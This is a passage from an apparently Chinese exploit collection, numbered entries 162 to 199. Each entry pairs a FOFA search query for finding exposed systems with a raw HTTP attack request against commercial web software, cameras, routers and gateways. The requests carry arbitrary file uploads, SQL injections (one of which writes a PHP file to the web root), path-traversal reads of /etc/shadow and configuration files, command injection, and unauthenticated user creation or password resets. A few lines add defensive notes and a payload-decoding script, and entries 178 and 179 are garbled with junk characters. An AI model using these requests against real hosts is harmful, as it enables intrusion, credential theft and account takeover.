FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

The uploaded file is served from:
http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团分销管理系统 (SIM-card distribution management system) ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--


164. 慧校园(安校易)管理系统 (smart-campus management system) FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

The server renames the upload; it is served from:
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信票务管理平台 (Zhongcheng Kexin ticketing platform) SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 (Lean value management system) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


168. 宏景EHR (HJSOFT HCM) OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
The path parameter is an encoded file path; the value below is the one published with the proof of concept.
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close


169. 宏景EHR (HJSOFT HCM) downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
The ../ prefix under /templates/attestation/ bypasses the authentication filter before reaching the vulnerable servlet; the payload is a time-based (SQL Server WAITFOR DELAY) test.
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close



170. 宏景EHR (HJSOFT HCM) DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6 (Tongtianxing CMSV6 vehicle GPS monitoring platform) SQL injection
FOFA:body="/808gps/"
The ";downloadLogger.action" path-parameter suffix bypasses the access check on delete.do; the payload is a time-based (MySQL SLEEP) test.
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close



172. DT-高清车牌识别摄像机 (DT HD licence-plate recognition camera) arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive



173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
Affects gateways with the IPSec VPN or Mobile Access blade enabled; Check Point published a hotfix on 2024-05-28. Reading /etc/shadow lets an attacker recover local account hashes, so treat any such request in gateway logs as a compromise indicator, not just a scan.
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow



174. 金和OA C6 (Jinher OA C6) FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close



175. 金和OA C6 (Jinher OA C6) IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


176. 电信网关配置管理系统 (telecom gateway configuration management system) rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--


177. H3C router sensitive information disclosure (configuration file download)
Request the path for the device model; an affected router returns its configuration file without authentication.
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

" K+ @ C0 v" D5 J8 c* c, s178. H3C校园网自助服务系统-flexfileupload-任意文件上传
. e2 z4 D& G- i5 S6 j& p% H9 z/ rFOFA:header="/selfservice"5 X9 l5 F, f5 B7 i
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
9 g8 @! E* i4 m2 }8 n7 j4 g( xHost:
3 x" H3 M6 n6 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
; k+ A3 l: D J2 MContent-Length: 2521 ~ ?& V2 N* y$ S
Accept-Encoding: gzip, deflate% e) a* r! c6 m
Connection: close
9 I8 U- b* d$ q# w# j% ]Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l. h3 u6 V+ P+ q$ x& Q
-----------------aqutkea7vvanpqy3rh2l9 x0 y+ }% M1 F# v5 I& Q
Content-Disposition: form-data; name="12234.txt"; filename="12234"5 x7 N1 Q% ?1 J$ a" o! ]7 t
Content-Type: application/octet-stream. ~6 o& G+ r# ?( R! J
Content-Length: 255) Y" y7 e' v8 `2 y' q, x4 p. K6 F0 j
5 H/ l0 ?1 }5 `8 P* c! z: Z( c# {" R
12234
% E, I5 }" \# Z# X8 G-----------------aqutkea7vvanpqy3rh2l--
; X) B6 ^6 n" ^4 }' A/ y' ~0 o* d: Y% z
# W; C( O! O/ C0 A# B' @
GET /imc/primepush/%2e%2e/flex/12234.txt
8 ]7 d9 T. V1 v" h% K# }- a f4 [& J! h4 N# @2 t
0 g/ u# l7 ]" n3 e% ~179. 建文工程管理系统存在任意文件读取9 K9 T. w4 m1 j$ ]4 R( R* H2 u
POST /Common/DownLoad2.aspx HTTP/1.18 g" G9 w: l" `$ F& E: i4 J
Host: {{Hostname}}
( J* j5 z+ V/ m- bContent-Type: application/x-www-form-urlencoded; x2 [' n6 z5 I6 u& E; Y( E
User-Agent: Mozilla/5.07 _8 @, x2 r/ H& |# P6 j' s& l
2 A$ `4 F# F/ U2 o% z- d( C8 qpath=../log4net.config&Name=- e0 u: _" _1 h" u# F
$ @3 u6 m* a+ d# O' A$ s! j' u6 J( H+ }$ q) v' h3 w
180. 帮管客 CRM (Bangguanke CRM) jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


181. 润申信息科技企业标准化管理系统 (Runshen enterprise standardisation management system) UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技企业标准化管理系统 (Runshen enterprise standardisation management system) AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创图书馆集群管理系统 (Interlib library cluster management system) updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
The payload is an Oracle error-based test (ctxsys.drithsx.sn); note that the endpoint itself is a password-change call, so a successful request also resets the named operator's password.
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"
The endpoint accepts a raw SQL statement as the request body and executes it against the user table.
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')


185. 瑞友天翼应用虚拟化系统 (Realor Tianyi application virtualisation system) SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
The stacked query writes the output of unhex(...) INTO OUTFILE under WebRoot, turning the injection into a file write; the hex blob decodes to a short self-deleting PHP script.
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

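When an INTO OUTFILE injection like the one above shows up in a log, the two facts a responder needs are the path the database was asked to write and the bytes it was asked to write there. The following is an added example (not code from the original write-up or from the vendor) that pulls both out of the request line. The regex and the function names are this example's own; the hex blob and the outfile path in the sample are copied from the request on the page.

```python
# Added example (not from the original write-up): decode the unhex(...) INTO
# OUTFILE payload carried in a URL, returning the target path and file bytes.
# OUTFILE_RE and decode_outfile_payload are this example's own; SAMPLE_URL is
# rebuilt from the request line on the page.
import re
from urllib.parse import unquote_plus

OUTFILE_RE = re.compile(
    r"unhex\s*\(\s*'(?P<hex>[0-9a-fA-F]+)'\s*\)\s*into\s+(?:out|dump)file\s+'(?P<path>[^']+)'",
    re.I,
)


def decode_outfile_payload(url: str):
    """Return (target_path, file_bytes) for an INTO OUTFILE / DUMPFILE
    injection carried in a URL, or None when the pattern is absent."""
    decoded = unquote_plus(url)          # '+' -> space, %27 -> ', %5C -> \
    match = OUTFILE_RE.search(decoded)
    if not match:
        return None
    # inside a MySQL string literal a doubled backslash is one backslash
    path = match.group("path").replace("\\\\", "\\")
    return path, bytes.fromhex(match.group("hex"))


SAMPLE_URL = (  # constructed from the request line on the page
    "/index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%27"
    "3c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b"
    "%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23"
)

if __name__ == "__main__":
    result = decode_outfile_payload(SAMPLE_URL)
    if result:
        path, content = result
        print("would write:", path)
        print(content.decode("utf-8", "replace"))
```

The relative path is resolved by the database server against its own data directory, not by the web server, which is why the payload climbs two levels before descending into WebRoot; checking that the MySQL account lacks the FILE privilege (or that secure_file_priv is set) is the server-side control that defeats this class of write.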
186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power plants.
FOFA:title=="DataCube3"
The payload is a SQLite heavy-query (RANDOMBLOB) time-based test.
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
Same issue as entry 158 (the CVE is assigned to the Masa CMS fork); this variant uses a time-based (MySQL SLEEP) payload.
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 (Santi Jiahui video conferencing) attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


189. 蓝网科技临床浏览系统 (LANWON clinical image viewer) deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
The poi parameter is fetched as a URL, so a file:// scheme reads local files; other schemes would make this a server-side request forgery.
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 (ESAFENET CDG document security system) NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 Foreign Trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科 云鉴 Security Management System setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE Enterprise Operations Management Platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 Internet Behavior Management System send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 Unified Authentication Platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 Customer Resource Management System Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit assetsmanager/upload endpoint file upload

1. Run the PoC to obtain the CSRF token, then obtain the cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
2. Use the JWT obtained in the previous step to get the cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/
FOFA:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

